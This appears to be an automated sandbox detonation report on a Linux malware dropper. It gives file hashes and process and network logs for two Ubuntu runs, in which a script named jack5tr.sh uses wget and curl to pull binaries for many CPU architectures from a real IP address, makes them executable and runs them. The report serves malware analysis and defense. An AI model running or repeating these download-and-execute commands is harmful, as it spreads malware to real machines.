| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
6s
Max time network
180s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x config-err-YYA4jL jack5tr.sh RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x arc config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x arc arm config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x arc arm arm5 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN sh4 snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.48:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu2404-amd64-20240729-en
Max time kernel
2s
Max time network
131s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/RUN | /tmp/RUN | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.5.0 | N/A | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x RUN arc arm gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh mips mpsl snap-private-tmp systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
